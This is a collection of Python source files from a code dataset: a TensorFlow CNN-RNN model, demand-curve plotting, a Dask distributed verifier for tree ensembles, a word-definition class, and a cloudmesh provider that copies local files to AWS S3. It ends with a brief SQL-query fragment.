tf.reshape(tf.concat(outputs_rnn, 1), [-1, rnn_size])\n # Map RNN output to multimodal space\n w_r2m = tf.get_variable(\"w_r2m\", [rnn_size, mm_size])\n b_r2m = tf.get_variable(\"b_r2m\", [mm_size])\n multimodal_l = tf.nn.relu(tf.matmul(output_rnn, 
w_r2m) + b_r2m)\n \n # Map Visual feature to multimodal space\n w_vf2m = tf.get_variable(\"w_vf2m\", [vf_size, mm_size])\n b_vf2m = tf.get_variable(\"b_vf2m\", [mm_size])\n mm_vf_single = tf.nn.relu(tf.matmul(self._visual_features, w_vf2m) + b_vf2m)\n mm_vf = tf.reshape(tf.tile(mm_vf_single, [1, num_steps]), [-1, mm_size])\n multimodal_l = multimodal_l + mm_vf\n if is_training and config.keep_prob_mm < 1:\n multimodal_l = tf.nn.dropout(multimodal_l, config.keep_prob_mm)\n \n # Map multimodal space to word space\n w_m2w = tf.get_variable(\"w_m2w\", [mm_size, emb_size])\n b_m2w = tf.get_variable(\"b_m2w\", [emb_size])\n output = tf.nn.relu(tf.matmul(multimodal_l, w_m2w) + b_m2w)\n elif config.multimodal_type == 'init':\n # Mapping visual feature to the RNN state\n w_vf2state = tf.get_variable(\"w_vf2state\", [vf_size, state_size])\n b_vf2state = tf.get_variable(\"b_vf2state\", [state_size])\n if flag_reset_state:\n self._initial_state = initial_state = tf.placeholder(tf.float32, \n [batch_size, state_size])\n else:\n self._initial_state = initial_state = tf.nn.relu(\n tf.matmul(self._visual_features, w_vf2state) + b_vf2state)\n \n # Run RNNs\n inputs = [tf.squeeze(input_, [1])\n for input_ in tf.split(1, num_steps, inputs)]\n outputs_rnn, state = tf.contrib.rnn.static_rnn(cell, inputs, \n initial_state=initial_state,\n sequence_length=self._seq_lens)\n self._final_state = state\n output_rnn = tf.reshape(tf.concat(1, outputs_rnn), [-1, rnn_size])\n \n # Map multimodal space to word space\n w_m2w = tf.get_variable(\"w_m2w\", [rnn_size, emb_size])\n b_m2w = tf.get_variable(\"b_m2w\", [emb_size])\n output = tf.nn.relu(tf.matmul(output_rnn, w_m2w) + b_m2w)\n else:\n raise NameError(\"Unknown multimodal type %s!\" % config.multimodal_type)\n \n # Build sampled softmax loss\n # share the weights between embedding and softmax acc. 
to [2]\n w_loss = tf.transpose(embedding)\n b_loss = tf.get_variable(\"b_loss\", [vocab_size])\n self._logit = logit = tf.matmul(output, w_loss) + b_loss\n \n target = tf.reshape(math_ops.to_int64(self._targets), [-1])\n valid_flag = tf.reshape(self._valid_flags, [-1])\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = logit, labels=target)\n self._cost = cost = tf.reduce_sum(loss * valid_flag) / (tf.reduce_sum(valid_flag) + 1e-12)\n \n # Create saver if necessary\n if flag_with_saver:\n self.saver = tf.train.Saver(max_to_keep=None)\n else:\n self.saver = None\n \n # Create learning rate and gradients optimizer\n tvars = tf.trainable_variables()\n self._grads, _ = grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),\n config.max_grad_norm)\n \n # Return the model if it is just for inference\n if not is_training:\n return\n \n self._lr = tf.Variable(0.0, trainable=False)\n if hasattr(config, 'optimizer'):\n if config.optimizer == 'ori':\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\n elif config.optimizer == 'ada': # No GPU\n optimizer = tf.train.AdagradOptimizer(self.lr)\n elif config.optimizer == 'adam':\n optimizer = tf.train.AdamOptimizer(self.lr)\n elif config.optimizer == 'rms':\n optimizer = tf.train.RMSPropOptimizer(self.lr)\n else:\n raise NameError(\"Unknown optimizer type %s!\" % config.optimizer)\n else:\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\n \n self._train_op = optimizer.apply_gradients(zip(grads, tvars))\n\n def assign_lr(self, session, lr_value):\n session.run(tf.assign(self.lr, lr_value))\n\n @property\n def input_data(self):\n return self._input_data\n \n @property\n def input_data_scale(self):\n return self._input_data_scale\n \n @property\n def targets(self):\n return self._targets\n \n @property\n def valid_flags(self):\n return self._valid_flags\n \n @property\n def visual_features(self):\n return self._visual_features\n \n @property\n def seq_lens(self):\n return self._seq_lens\n \n @property\n def cost(self):\n return self._cost\n \n @property\n def final_state(self):\n return self._final_state\n \n @property\n def initial_state(self):\n return self._initial_state\n \n @property\n def lr(self):\n return self._lr\n \n @property\n def train_op(self):\n return self._train_op\n \n @property\n def embedding(self):\n return self._embedding\n \n @property\n def logit(self):\n return self._logit\n\n @property\n def grads(self):\n return self._grads","sub_path":"model/CNN_RNN.py","file_name":"CNN_RNN.py","file_ext":"py","file_size_in_byte":10959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31122908","text":"\"\"\"\nPlots for Report:\nNumerical Experiments for Verifying Demand Driven Deployment Algorithms\nNon-Optimizing Algorithm\n\"\"\"\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\ndef demand_curve_type(x_vals, type, input1, input2, input3):\n \"\"\" Y value calculation based on demand curve type and input values\n\n Parameters\n ----------\n x_vals: list of timestep values\n type: string of type of demand curve (i.e. 
linear, exponential, step-wise)\n input 1: exponential -- initial demand, linear -- gradient,\n stepwise -- y-value of first segment\n input 2: exponential -- growth rate, linear -- y intercept,\n stepwise -- y-value of second segment\n input 3: stepwise -- timestep it changes from first to second segment\n\n Returns\n -------\n returns a plot of demand and acceptable supply range amount for a\n specified commodity\n\n \"\"\"\n\n if type == 'exponential':\n initial_demand = input1\n growth_rate = input2\n y_vals = [(initial_demand * (1 + growth_rate)**(x / 12))\n for x in x_vals]\n\n elif type == \"linear\":\n gradient = input1\n intercept = input2\n y_vals = [(gradient * x + intercept) for x in x_vals]\n\n elif type == \"stepwise\":\n first_y = input1\n second_y = input2\n timestep_change = input3\n x_vals_1 = x_vals[:timestep_change + 1]\n x_vals_1 = list(x_vals_1)\n x_vals_2 = x_vals[timestep_change:]\n x_vals_2 = list(x_vals_2)\n x_vals = x_vals_1 + x_vals_2\n y_vals_1 = [first_y] * (timestep_change + 1)\n timesteps_2 = (x_vals[-1] - timestep_change + 1)\n timesteps_2 = int(timesteps_2)\n y_vals_2 = [second_y] * timesteps_2\n y_vals = y_vals_1 + y_vals_2\n\n return y_vals, x_vals\n\n\ndef plot_demand_supply(duration, demand_curve, input1,\n input2, input3, commodity, test_name, demand_driving):\n \"\"\" Plots demand and acceptable supply range amount for a commodity\n\n Parameters\n ----------\n duration: int of number of timesteps in scenario\n demand_curve: string of type of demand curve (i.e. linear, exponential,\n step-wise)\n input 1: int, depending on which demand_curve, see func demand_curve_type\n input 2: int, depending on which demand_curve, see func demand_curve_type\n input 3: int, depending on which demand_curve, see func demand_curve_type\n commodity: string of tracked commodity\n test_name: string of test name\n demand_driving: True/False boolean, True if the commodity is the\n demand-driving commodity\n\n Returns\n -------\n returns a plot of demand and acceptable supply range amount for a specified\n commodity\n\n \"\"\"\n x_vals = np.linspace(0, duration, duration + 1)\n y_vals, x_vals = demand_curve_type(\n x_vals, demand_curve, input1, input2, input3)\n error_vals = [y * 0.1 for y in y_vals]\n positive_y = [x + y for x, y in zip(y_vals, error_vals)]\n negative_y = [x - y for x, y in zip(y_vals, error_vals)]\n\n fig, ax = plt.subplots(figsize=(15, 7))\n ax.plot(x_vals, y_vals, 'k-', label='Demand')\n ax.fill_between(x_vals, positive_y, negative_y,\n label='Acceptable Supply Range')\n ax.grid()\n box = ax.get_position()\n ax.set_position([box.x0, box.y0 + box.height, box.width, box.height * 1])\n handles, labels = ax.get_legend_handles_labels()\n ax.legend(\n handles,\n labels,\n fontsize=13,\n loc='upper center',\n bbox_to_anchor=(\n 0.85,\n 1.2),\n fancybox=True)\n ax.set_xlim(0, duration)\n ax.set_ylim(0, y_vals[-1] * 1.2)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n ax.set_xlabel('Timestep (month)', fontsize=14)\n ax.set_ylabel('%s Amount (kg)' % commodity, fontsize=14)\n if demand_driving:\n ax.set_title(\n 'Test %s : %s (Demand-driving Commodity) demand and acceptable range for its supply' %\n (test_name, commodity), fontsize=16)\n else:\n ax.set_title(\n 'Test %s : %s demand and acceptable range for its supply' %\n (test_name, commodity), fontsize=16)\n plt.savefig(\n '%s_%s_demand_supply' %\n (commodity, test_name), bbox_inches=\"tight\")\n\n return 
fig\n","sub_path":"docs/no/figures/plot_figures.py","file_name":"plot_figures.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336864413","text":"# Copyright 2019 DTAI Research Group - KU Leuven.\n# License: Apache License 2.0\n# Author: Laurens Devos\n\nimport timeit, math, time\n\nfrom dask.distributed import wait\n\nfrom . import DomTree, DomTreeLeaf\nfrom .verifier import Verifier, VerifierTimeout, VerifierNotExpr\nfrom .verifier import in_domain_constraint\n\n\nclass VerifierFactory:\n \"\"\" Must be pickleable \"\"\"\n\n def __call__(self, domtree_leaf, path_checking):\n \"\"\"\n Override this method for your verifier factory.\n\n You can return a less constrained verifier for the path_checking part.\n \"\"\"\n raise RuntimeError(\"Override this method in your own verifier \"\n + \"factory defining your problem's constraints.\")\n\n def inv_logit(self, prob):\n \"\"\" Convert probability to raw output values for binary classification. \"\"\"\n return -math.log(1.0 / x - 1)\n\n\n\nclass _VerifierFactoryWrap(VerifierFactory):\n def __init__(self, vfactory, add_domain_constraints_opt):\n self._vfactory = vfactory\n self.add_domain_constraints_opt = add_domain_constraints_opt\n\n def __call__(self, lk, path_checking):\n v = self._vfactory(lk, path_checking)\n if self.add_domain_constraints_opt:\n for instance_index in range(lk.num_instances()):\n v.add_constraint(in_domain_constraint(v,\n lk.get_domains(instance_index),\n instance=instance_index))\n return v\n\n\n\n\n\nclass DistributedVerifier:\n\n def __init__(self,\n client,\n domtree,\n verifier_factory,\n check_paths = True,\n num_initial_tasks = 1,\n stop_when_num_sats = 1,\n add_domain_constraints = True,\n global_timeout = 0,\n timeout_start = 30,\n timeout_max = 600,\n timeout_grow_rate = 1.5):\n\n assert isinstance(verifier_factory, VerifierFactory), \"invalid verifier factory\"\n\n self._timeout_start = float(timeout_start)\n self._timeout_max = float(max(timeout_start, timeout_max))\n self._timeout_rate = float(timeout_grow_rate)\n self._nworkers = sum(client.nthreads().values())\n\n self._client = client # dask client\n self._domtree = domtree\n\n self._verifier_factory = _VerifierFactoryWrap(verifier_factory,\n add_domain_constraints)\n\n self._check_paths_opt = check_paths\n self._num_initial_tasks_opt = num_initial_tasks\n self._stop_when_num_sats_opt = stop_when_num_sats\n self._global_timeout_opt = global_timeout\n\n self._stop_flag = False\n self._print_queue = []\n\n def check(self):\n self.done_count = 0\n self.start_time = timeit.default_timer()\n self.sat_count = 0\n\n self._fs = []\n self.results = {}\n\n # 1: loop over trees, check reachability of each path from root in\n # addtrees of all instances\n l0 = self._domtree.get_leaf(self._domtree.tree().root())\n if self._check_paths_opt:\n t0 = timeit.default_timer()\n l0 = self._check_paths(l0)\n t1 = timeit.default_timer()\n self.results[\"check_paths_time\"] = t1 - t0\n\n # domtree_node_id => result info per instance + additional info\n self.results[\"num_leafs\"] = [l0.addtree(i).num_leafs()\n for i in range(l0.num_instances())]\n self.results[0] = self._init_results(l0)\n\n self._print(\"num_leafs {}\".format(self.results[\"num_leafs\"]))\n self._print_flush()\n\n # 2: splits until we have a piece of work for each worker\n if self._num_initial_tasks_opt > 1:\n t0 = timeit.default_timer()\n lks = self._generate_splits(l0, self._num_initial_tasks_opt)\n t1 = 
timeit.default_timer()\n self.results[\"generate_splits_time\"] = t1 - t0\n else:\n lks = [l0]\n\n # 3: submit verifier 'check' tasks for each item in `ls`\n for lk in lks:\n f = self._make_verify_future(lk, self._timeout_start)\n self._fs.append(f)\n\n # 4: wait for future to complete, act on result\n # - if sat/unsat -> done (finish if sat if opt set)\n # - if new split -> schedule two new tasks\n while len(self._fs) > 0: # while task are running...\n if self._stop_flag:\n self._print(\"Stop flag: cancelling remaining tasks\")\n for f in self._fs:\n f.cancel()\n self._stop_flag = False\n break\n if self._global_timeout_opt > 0:\n t = timeit.default_timer() - self.start_time\n if t > self._global_timeout_opt:\n self._print(\"Global timeout: cancelling remaining tasks\")\n for f in self._fs:\n f.cancel()\n break\n\n wait(self._fs, return_when=\"FIRST_COMPLETED\")\n\n next_fs = []\n for f in self._fs:\n if f.done(): next_fs += self._handle_done_future(f)\n else: next_fs.append(f)\n self._fs = next_fs\n self._print_flush()\n\n self.results[\"check_time\"] = timeit.default_timer() - self.start_time\n self._print_flush()\n\n def _check_paths(self, l0):\n num_unreachable_before = [l0.num_unreachable(i) for i in range(l0.num_instances())]\n\n self._print(\"checking paths\")\n self._print_flush()\n\n # update reachabilities in domtree root leaf 0 in parallel\n fs = []\n for instance_index in range(l0.num_instances()):\n for tree_index in range(len(l0.addtree(instance_index))):\n f = self._client.submit(DistributedVerifier._check_tree_paths,\n l0, instance_index, tree_index, self._verifier_factory)\n fs.append(f)\n\n wait(fs)\n\n l0 = DomTreeLeaf.merge([f.result() for f in fs])\n num_unreachable_after = [l0.num_unreachable(i) for i in range(l0.num_instances())]\n\n self._print(\"check_paths({}): {} -> {}\".format(l0.domtree_leaf_id(),\n num_unreachable_before, num_unreachable_after))\n self._print_flush()\n\n return l0\n\n def _generate_splits(self, l0, ntasks):\n # split domtrees until we have ntask `Subspace`s; this runs locally\n l0.find_best_split()\n lks = [l0]\n\n while len(lks) < ntasks:\n max_score = 0\n max_lk = None\n\n for lk in lks:\n if lk.score > max_score:\n max_score = lk.score\n max_lk = lk\n\n if max_lk is None:\n raise RuntimeError(\"no more splits!\")\n\n lks.remove(max_lk)\n lks += self._split_domtree(max_lk, True)\n\n self._print_flush()\n return lks\n\n def _split_domtree(self, lk, find_best_split):\n nid = lk.domtree_leaf_id()\n split = lk.get_best_split()\n score, balance = lk.score, lk.balance\n\n self._domtree.apply_leaf(lk) # lk's fields are invalid after .split(lk)\n\n l, r = self._domtree.tree().left(nid), self._domtree.tree().right(nid)\n lk_l = self._domtree.get_leaf(l)\n lk_r = self._domtree.get_leaf(r)\n\n if find_best_split:\n lk_l.find_best_split()\n lk_r.find_best_split()\n\n self.results[nid][\"split\"] = split\n self.results[nid][\"score\"] = score\n self.results[nid][\"balance\"] = balance\n self.results[nid][\"children\"] = [l, r]\n\n self.results[l] = self._init_results(lk_l)\n self.results[r] = self._init_results(lk_r)\n self.results[l][\"parent\"] = nid\n self.results[r][\"parent\"] = nid\n\n self._print(\"SPLIT l{}: {} into {}, {}, score {} \".format(\n nid, split, l, r, score))\n\n return [lk_l, lk_r]\n\n def _handle_done_future(self, f):\n t = f.result()\n status, check_time, num_leafs = t[0], t[1], t[2]\n\n self._print(\"{} for l{} in {:.2f}s (timeout={:.1f}s, #leafs={})\".format(status,\n f.domtree_leaf_id, check_time, f.timeout, num_leafs))\n\n 
self.results[f.domtree_leaf_id][\"status\"] = status\n self.results[f.domtree_leaf_id][\"check_time\"] = check_time\n self.results[f.domtree_leaf_id][\"num_leafs\"] = num_leafs\n\n # We're finished with this branch!\n if status != Verifier.Result.UNKNOWN:\n self.done_count += 1\n model = t[3]\n self.results[f.domtree_leaf_id][\"model\"] = model\n if status.is_sat(): self.sat_count += 1\n if self.sat_count >= self._stop_when_num_sats_opt:\n self._stop_flag = True\n return []\n\n else: # We timed out, split and try again\n lk = t[3]\n self.results[f.domtree_leaf_id][\"num_unreachable_after\"] = self._num_unreachable(lk)\n next_timeout = min(self._timeout_max, self._timeout_rate * f.timeout)\n\n new_lks = self._split_domtree(lk, False)\n new_fs = [self._make_verify_future(lk, next_timeout) for lk in new_lks]\n\n return new_fs\n\n\n\n\n def _make_verify_future(self, lk, timeout):\n nid = lk.domtree_leaf_id()\n tree = self._domtree.tree()\n parent_split = None\n\n if not tree.is_root(nid) and self._check_paths_opt:\n pid = tree.parent(nid)\n parent_split = tree.get_split(pid)\n\n f = self._client.submit(DistributedVerifier._verify_fun,\n lk, timeout, self._verifier_factory, parent_split)\n\n f.timeout = timeout\n f.domtree_leaf_id = nid\n return f\n\n def _init_results(self, lk):\n return {\n \"num_unreachable_before\": self._num_unreachable(lk),\n \"bounds\": self._tree_bounds(lk),\n \"domains\": [lk.get_domains(i) for i in range(lk.num_instances())]\n }\n\n def _num_unreachable(self, lk):\n return sum(map(lambda i: lk.num_unreachable(i), range(lk.num_instances())))\n\n def _tree_bounds(self, lk):\n bounds = []\n for i in range(lk.num_instances()):\n lo, hi = 0.0, 0.0\n for tree_index in range(len(lk.addtree(i))):\n bnds = lk.get_tree_bounds(i, tree_index)\n lo += bnds[0]\n hi += bnds[1]\n bounds.append((lo, hi))\n return bounds\n\n def _print(self, msg):\n self._print_queue.append(msg)\n\n def _print_flush(self):\n for msg in self._print_queue:\n self._print_msg(msg)\n self._print_queue = []\n\n def _print_msg(self, msg):\n t = int(timeit.default_timer() - self.start_time)\n m, s = t // 60, t % 60\n h, m = m // 60, m % 60\n done = self.done_count\n rem = len(self._fs) if hasattr(self, \"_fs\") else -1\n print(f\"[{h}h{m:02d}m{s:02d}s {done:>4} {rem:<4}]\", msg)\n\n\n\n\n\n # - WORKERS ------------------------------------------------------------- #\n\n @staticmethod\n def _check_tree_paths(lk, instance_index, tree_index,\n v_or_vfactory, only_feat_id = -1):\n addtree = lk.addtree(instance_index)\n tree = addtree[tree_index]\n stack = [(tree.root(), True)]\n\n v = v_or_vfactory\n if not isinstance(v, Verifier):\n v = v_or_vfactory(lk, True)\n\n v.instance(instance_index).mark_unreachable_paths(tree_index, only_feat_id)\n\n return lk\n\n @staticmethod\n def _recheck_tree_paths(lk, v, feat_id):\n for i in range(lk.num_instances()):\n num_reach_before = lk.num_unreachable(i)\n for tree_index in range(len(lk.addtree(i))):\n lk = DistributedVerifier._check_tree_paths(lk, i, tree_index, v, feat_id)\n print(\"_recheck_tree_paths({}): num_unreachable({}): {} -> {}\".format(\n lk.domtree_leaf_id(), i, num_reach_before, lk.num_unreachable(i)))\n return lk\n\n @staticmethod\n def _verify_fun(lk, timeout, vfactory, parent_split = None):\n v = vfactory(lk, False)\n\n # Re-checking reachabilities after split, only for splits involving feat_id\n if parent_split is not None and lk.num_instances() > 1:\n feat_id = parent_split[1].feat_id\n lk = DistributedVerifier._recheck_tree_paths(lk, v, feat_id)\n\n 
v.set_timeout(timeout)\n v.add_all_trees()\n num_leafs = [v.instance(i).leaf_count for i in range(lk.num_instances())]\n try:\n status = v.check()\n model = {}\n if status.is_sat():\n model = v.model()\n model[\"family\"] = v.model_family(model)\n\n return status, v.check_time, num_leafs, model\n\n except VerifierTimeout as e:\n lk.find_best_split()\n\n print(f\"timeout after {e.unk_after} (timeout = {timeout}) best split = {lk.get_best_split()}\")\n\n return Verifier.Result.UNKNOWN, v.check_time, num_leafs, lk\n","sub_path":"src/python/treeck/distributed.py","file_name":"distributed.py","file_ext":"py","file_size_in_byte":12905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"65562377","text":"\n\n#calss header\nclass _STORM():\n\tdef __init__(self,): \n\t\tself.name = \"STORM\"\n\t\tself.definitions = [u'an extreme weather condition with very strong wind, heavy rain, and often thunder and lightning: ', u'a very angry reaction from a lot of people: ', u'to be suddenly extremely successful in a place or with a group of people: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_storm.py","file_name":"_storm.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"56305667","text":"import os\nimport stat\nfrom pprint import pprint\n\nimport boto3\nfrom botocore.exceptions import ClientError\nfrom cloudmesh.storage.StorageNewABC import StorageNewABC\nimport oyaml as yaml\nfrom cloudmesh.common.debug import VERBOSE\nfrom cloudmesh.common.StopWatch import StopWatch\nfrom cloudmesh.common.console import Console\nfrom cloudmesh.common.util import banner\nfrom cloudmesh.common.Printer import Printer\nfrom cloudmesh.configuration.Config import Config\nfrom google.cloud import storage\n\nfrom pathlib import Path\nfrom glob import glob\nimport os\nimport shutil\n\n\nclass Provider(StorageNewABC):\n \"\"\"\n Provider class for local storage.\n This class allows transfer of objects from local storage location to a\n Azure blob storage container or gcp bucket.\n\n Default parameters are read from ~/.cloudmesh/cloudmesh.yaml :\n\n storage:\n local:\n cm:\n azureblob: true\n blobactive: true\n heading: local_to_CSP\n host: localhost\n kind: local\n label: local_storage\n version: 0.1\n service: storage\n default:\n directory: ~\\cmStorage\n credentials:\n userid: None\n password: None\n \"\"\"\n\n def __init__(self, service=None, config=\"~/.cloudmesh/cloudmesh.yaml\",\n **kwargs):\n super().__init__(service=service, config=config)\n\n if kwargs.get(\"debug\"):\n print(\"Inside init of local provider\")\n print(self.kind)\n print(kwargs.get('sourceObj'))\n print(kwargs.get('target'))\n print(kwargs.get('targetObj'))\n print(self.credentials)\n\n # Processing --source/service and --target arguments separately.\n # This is a provider class for local storage hence --source/service will \\\n # always be \"local\"\n\n self.sourceCSP = self.service\n\n try:\n self.config = Config(config_path=config)\n self.yaml_content_source = self.config[\"cloudmesh.storage.\"\n f\"{self.sourceCSP}\"]\n self.source_kind = self.yaml_content_source[\"cm\"][\"kind\"]\n self.source_credentials = self.yaml_content_source[\"credentials\"]\n\n print(\"Accessing local storage location.\")\n if 
kwargs.get('sourceObj'):\n self.local_location = Path(self.yaml_content_source['default'][\n 'directory'],\n kwargs.get('sourceObj'))\n else:\n self.local_location = self.yaml_content_source['default'][\n 'directory']\n\n if kwargs.get(\"debug\"):\n print(f\"\\nLocal location to access {self.local_location}\")\n\n if kwargs.get('target'):\n self.targetCSP = kwargs.get('target')\n self.yaml_content_target = self.config[\"cloudmesh.storage.\"\n f\"{self.targetCSP}\"]\n self.target_kind = self.yaml_content_target[\"cm\"][\"kind\"]\n self.target_credentials = self.yaml_content_target[\n \"credentials\"]\n self.target_container = self.target_credentials[\"container\"]\n\n except Exception as e:\n Console.error(f\"Couldn't access cloudmesh.yaml. Error - {e}\")\n return ()\n\n if kwargs.get(\"debug\"):\n VERBOSE(self.yaml_content_source)\n if kwargs.get('target'):\n VERBOSE(self.yaml_content_target)\n\n banner(f\"Source CSP: {self.source_kind}\")\n if kwargs.get('target'):\n banner(f\"Target CSP: {self.target_kind}\")\n\n # Creating connection with the target CSP. This done only if the\n # --target argument is provided. Only \"copy\" command is expected to\n # have --target argument.\n\n if kwargs.get('target'):\n if self.target_kind == \"azureblob\":\n print(\"Create Azure connection.\")\n\n if 'TBD' == self.target_credentials[\"access_key_id\"] \\\n or 'TBD' == self.target_credentials[\"secret_access_key\"] \\\n or 'TBD' == self.target_credentials[\"region\"]:\n Console.error(\"Critical details missing from .yaml file. \"\n \"TBD not allowed. Please check.\")\n\n try:\n self.s3_client = boto3.client(\n 's3',\n aws_access_key_id=self.target_credentials[\n \"access_key_id\"],\n aws_secret_access_key=self.target_credentials[\n \"secret_access_key\"],\n region_name=self.target_credentials[\"region\"]\n )\n Console.ok(\n f\"Successful connection to {self.target_kind} is \"\n f\"made.\")\n except ClientError as e:\n Console.error(e, prefix=True, traceflag=True)\n\n elif self.kind == \"gcpbucket\":\n print(\"Create GCP connection.\")\n raise NotImplementedError\n else:\n raise NotImplementedError\n\n # TODO - check hor to pass recursive argument from master provider & transfer.py\n\n def list(self, service=None, sourceObj=None, recursive=False):\n \"\"\"\n Method to enlist all objects of target location.\n\n :param service: local/azureblob/gcpbucket\n :param sourceObj: source directory or file\n :param recursive: Boolean to indicate if sub components to be enlisted\n :return: list of lists containing objects from target location\n \"\"\"\n if self.source_kind == \"azureblob\":\n Console.error(\"This command should flow to azure provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"gcpbucket\":\n Console.error(\"This command should flow to gcp provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"awss3\":\n Console.error(\"This command should flow to AWS provider. 
Please \"\n \"check.\")\n return\n elif self.source_kind == \"local\":\n banner(f\"Executing list method for local storage:\\nSource object \"\n f\"is {self.local_location}\")\n if self.local_location.exists():\n if self.local_location.expanduser().is_file():\n os.chdir(os.path.split(self.local_location.expanduser())[0])\n\n if len(glob(sourceObj)) > 0:\n Console.ok(\"List of file(s):\\n\"\n f\"{self.local_location.expanduser()}\")\n else:\n Console.error(f\"File not found \"\n f\"{self.local_location.expanduser()}\")\n elif self.local_location.expanduser().is_dir():\n os.chdir(self.local_location.expanduser())\n Console.ok(f\"List if files in {self.local_location}:\\n\")\n for f in glob(\"**\", recursive=recursive):\n print(Path.cwd() / f)\n else:\n Console.error(f\"Source object {self.local_location} does not \"\n f\"exist.\")\n else:\n raise NotImplementedError\n return {}\n\n def delete(self, service=\"local\", sourceObj=None, recursive=False):\n \"\"\"\n This method deletes file(s) / folder(s) from the source location.\n\n :param service: \"local\" for this provider\n :param sourceObj: A file or folder to delete\n :param recursive: Delete files from folder/subfolders\n :return: None\n \"\"\"\n if self.source_kind == \"azureblob\":\n Console.error(\"This command should flow to AWS provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"gcpbucket\":\n Console.error(\"This command should flow to AWS provider. Please \"\n \"check.\")\n return\n elif self.source_kind == \"local\":\n banner(f\"Executing delete method for local storage:\\nSource object \"\n f\"is {self.local_location}\")\n\n if self.local_location.exists():\n if self.local_location.expanduser().is_file():\n os.chdir(os.path.split(self.local_location.expanduser())[0])\n\n if len(glob(sourceObj)) > 0:\n Console.ok(\"Following file will be removed:\\n\"\n f\"{self.local_location.expanduser()}\")\n os.remove(self.local_location.expanduser())\n else:\n Console.error(f\"File not found \"\n f\"{self.local_location.expanduser()}\")\n elif self.local_location.expanduser().is_dir():\n os.chdir(self.local_location.expanduser())\n Console.ok(f\"Following objects will be removed from: \"\n f\"{self.local_location}:\\n\")\n for f in glob(\"**\", recursive=recursive):\n print(Path.cwd() / f)\n\n shutil.rmtree(self.local_location.expanduser())\n else:\n Console.error(\n f\"Source object {self.local_location} does not exist.\")\n else:\n raise NotImplementedError\n return {}\n\n def s3_bucket_exists(self, target_container):\n \"\"\" ##FIX CODE FROM Here ##\n Determine whether bucket_name exists and the user has permission to\n access it\n\n :param target_container: azure blob name\n :return: True if the referenced bucket_name exists, otherwise False\n \"\"\"\n try:\n resp_exists = self.s3_client.head_bucket(Bucket=target_container)\n except ClientError as e:\n return False\n return True\n\n def copy(self, service=\"local\", sourceObj=\"abcd.txt\", target=\"aws\",\n targetObj=None, debug=True):\n \"\"\"\n copy method copies files/directories from local storage to target CSP\n\n :param service: \"local\" for this provider\n :param sourceObj: A file/directory to be copied\n :param targetObj: Name of the target object\n :param debug: Boolean indicating debug mode\n :return: None\n \"\"\"\n # To copy the whole cmStorage directory, pls provide sourceObj=None\n\n if self.s3_bucket_exists(self.target_container):\n Console.ok(f\"AWS S3 bucket {self.target_container} exists.\")\n\n # TODO : Check CLI option\n # CLI option\n # aws s3 cp 
C:\\Users\\kpimp\\cmStorage\n # s3://bucket-iris.json/cmStorage --recursive\n\n if sourceObj:\n self.local_location = Path(self.yaml_content_source['default'][\n 'directory'], sourceObj)\n print(\"=====> local location \", self.local_location)\n else:\n sourceObj = \"cmStorage\"\n self.local_location = self.yaml_content_source['default'][\n 'directory']\n\n if targetObj is None:\n targetObj = sourceObj\n\n source_path = Path(self.local_location)\n\n try:\n if source_path.expanduser().is_file():\n # TODO: Use queue here\n print(f\"Copying file. Pushed {source_path} to the queue.\")\n os.chdir(os.path.split(self.local_location.expanduser())[0])\n print(\"chdir to \", os.getcwd())\n try:\n response = self.s3_client.upload_file(sourceObj,\n self.target_container,\n targetObj)\n Console.ok(f\"Uploaded: {sourceObj}\")\n except ClientError as e:\n Console.error(f\"Error while uploading {source_path} \"\n f\"to S3 bucket: \\n\", e)\n elif source_path.expanduser().is_dir():\n print(\"Copying directory recursively\")\n os.chdir(source_path.expanduser())\n print(\"chdir to \", os.getcwd())\n\n for file in glob('**', recursive=True):\n # TODO: This creates files as foldername/filename\n # Check how to create directory structure in S3\n\n print(file)\n if Path(file).is_file():\n # TODO: Use queue here\n print(f\"Pushed {Path(file)} to the queue {file}.\")\n targetObj = file\n try:\n response = self.s3_client.upload_file(file,\n self.target_container,\n targetObj)\n Console.ok(f\"Uploaded: {file}\")\n except ClientError as e:\n Console.error(\n f\"Error while uploading {source_path} \"\n f\"to S3 bucket: \\n\", e)\n else:\n Console.error(f\"Invalid source object type: {source_path}\")\n return\n except Exception as e:\n print(e)\n\n else:\n Console.error(f\"AWS S3 bucket {self.target_container} does not \"\n f\"exist.\")\n\n\ndef main():\n print(\"Instantiating\")\n # following instantiating for copy command\n instance = Provider(service=\"local\", sourceObj=\"abcd.txt\", target=\"aws\",\n targetObj=None, debug=True)\n\n # Instantiating for list/delete command\n # instance = Provider(service=\"local\", sourceObj=\"a\",\n # targetObj=None, debug=True)\n\n # instance.list(service=\"local\", sourceObj=\"a\", recursive=True)\n\n # instance.delete(service=\"local\", sourceObj=\"a\", recursive=True)\n\n instance.copy(service=\"local\", sourceObj='abcd.txt', target=\"aws\",\n targetObj=None, debug=True)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"project/cloudmesh-transfer/cloudmesh/transfer/providers/gcpbucket/Provider.py","file_name":"Provider.py","file_ext":"py","file_size_in_byte":14627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402366216","text":"cursor.execute(\"SELECT * FROM users WHERE ID = ?\", ([str(from_id)]))\r\ninfo = cursor.fetchall()\r\n\r\nif info[0][7] > 0:\r\n\tgun = 